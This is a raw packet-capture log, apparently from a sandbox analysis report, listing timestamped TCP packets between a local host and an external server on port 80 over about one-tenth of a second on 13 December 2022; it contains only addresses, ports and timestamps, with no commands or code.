                                              Dec 13, 2022 20:09:16.814378023 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.814491987 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.814563990 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.814647913 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.814747095 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.814829111 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.814919949 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.815047026 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.815165043 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.815285921 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.815412045 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.815521002 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.815610886 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.815697908 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.815849066 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.815876961 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.815964937 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.816092968 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.816142082 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.816230059 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.816319942 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.816409111 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.816498995 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.816587925 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.816678047 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.816767931 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.816852093 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.816941977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.817032099 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.817117929 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.817209959 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.817298889 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.817387104 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.817476988 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.817564964 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.817656994 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.817744017 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.817831039 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.817924976 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.818011045 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.818098068 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.818188906 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.818276882 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.818362951 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.818454981 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.818541050 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.818629980 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.818717957 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.827096939 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.827251911 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.827348948 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.827466965 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.827594042 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.827722073 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.827814102 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.827915907 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.828037977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.828176022 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.828299999 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.828437090 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.828566074 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.828727007 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.828844070 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.828948975 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.829039097 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.829147100 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.829269886 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.829412937 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.829557896 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.829689980 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.829828024 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.829919100 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.830018044 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.830104113 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.830199003 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.830286980 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.830379963 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.830466986 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.830562115 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.830650091 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.830748081 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.830830097 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.830935001 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.831021070 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.831118107 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.831203938 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.831298113 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.831387043 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.831481934 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.831568003 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.831661940 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.831748962 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.831854105 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.831945896 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.832137108 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.832137108 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.832228899 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.832314968 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.832411051 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.832500935 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.832592964 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.836144924 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.836266994 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.836419106 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.836551905 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.836698055 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.836811066 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.836910963 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.837001085 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.837110043 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.837235928 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.837392092 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.837492943 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.837584972 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.837680101 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.837764978 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.837856054 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.837944031 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.838040113 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.838125944 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.838226080 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.838313103 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.838407993 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.838495016 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.838589907 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.838675976 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.838777065 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.838888884 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.838988066 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.839076996 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.839169025 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.839257956 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.839359045 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.839448929 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.839545965 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.839632988 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.852649927 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.852688074 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.852694035 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.852715015 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.852756023 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.852775097 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.852852106 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.852931976 CET804974462.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.852986097 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.852991104 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.853118896 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.853241920 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.853276968 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.853372097 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.853502035 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.853626966 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.853758097 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.853820086 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.853888035 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.853997946 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.854016066 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.854137897 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.854166985 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.854253054 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.854259968 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.854351997 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.854389906 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.854511976 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.854522943 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.854588032 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.854651928 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.854737043 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.854784012 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.854917049 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.855056047 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.855324030 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.855344057 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.855523109 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.855588913 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.856008053 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.856117010 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.856158018 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.856270075 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.856349945 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.856841087 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.856882095 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.857004881 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.857076883 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.857367992 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.857428074 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.857521057 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.857671976 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.857880116 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.857975960 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.858083963 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.858211040 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.858365059 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.858540058 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.858633041 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.858664989 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.858757019 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.858941078 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.858962059 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.859075069 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.859107971 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.859873056 CET804974462.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.859963894 CET4974480192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.863168001 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.863195896 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.863213062 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.863229990 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.863344908 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.863761902 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.863859892 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.863878012 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.863893986 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.863909960 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.864115953 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.864135981 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.864156008 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.864329100 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.864450932 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.865505934 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.865535021 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.865550995 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.865989923 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.866014957 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.866033077 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.866050005 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.866069078 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.866086006 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.866106033 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.866125107 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.866142988 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.866162062 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.866178989 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.866198063 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.866343975 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.866365910 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.866446972 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.866555929 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.866674900 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.866806030 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.867115021 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.867136955 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.867152929 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.867285967 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.867444992 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.867468119 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.867660046 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.867721081 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.867794037 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.867918968 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.868227959 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.868256092 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.870239973 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.870322943 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.870424986 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.870446920 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.870491982 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.870539904 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.870642900 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.870728970 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.870825052 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.870913029 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.871009111 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.871100903 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.871191025 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.871279001 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.871373892 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.871464014 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.871556997 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.871644974 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.871741056 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.871828079 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.871922970 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.872013092 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.872106075 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.872195005 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.872288942 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.872380018 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.872477055 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.872565031 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.872659922 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.872749090 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.872848034 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.872936964 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.873034954 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.873125076 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.873226881 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.873313904 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.873411894 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.873502016 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.873600960 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.873687983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.873783112 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.873871088 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.873965979 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.874054909 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.874152899 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.874547005 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.874651909 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.874802113 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.874891996 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.874902964 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.874929905 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.875010014 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.875026941 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.875047922 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.875066042 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.875127077 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.875219107 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.875300884 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.875416994 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.875519991 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.875644922 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.875803947 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.875879049 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.876131058 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.876156092 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.876177073 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.876281977 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.876302004 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.876425982 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.876672029 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.876708031 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.876725912 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.876912117 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.877053022 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.877099991 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.877119064 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.877196074 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.877317905 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.877399921 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.877547979 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.877631903 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.877752066 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.877774000 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.877937078 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.878007889 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.878032923 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.878129005 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.878246069 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.878365040 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.878470898 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.878580093 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.878695011 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.878720999 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.878745079 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.878958941 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.878993988 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.879019022 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.879093885 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.879215002 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.880471945 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.880657911 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.880769014 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.880867004 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.880954981 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.881050110 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.881136894 CET4973680192.168.2.362.204.41.79
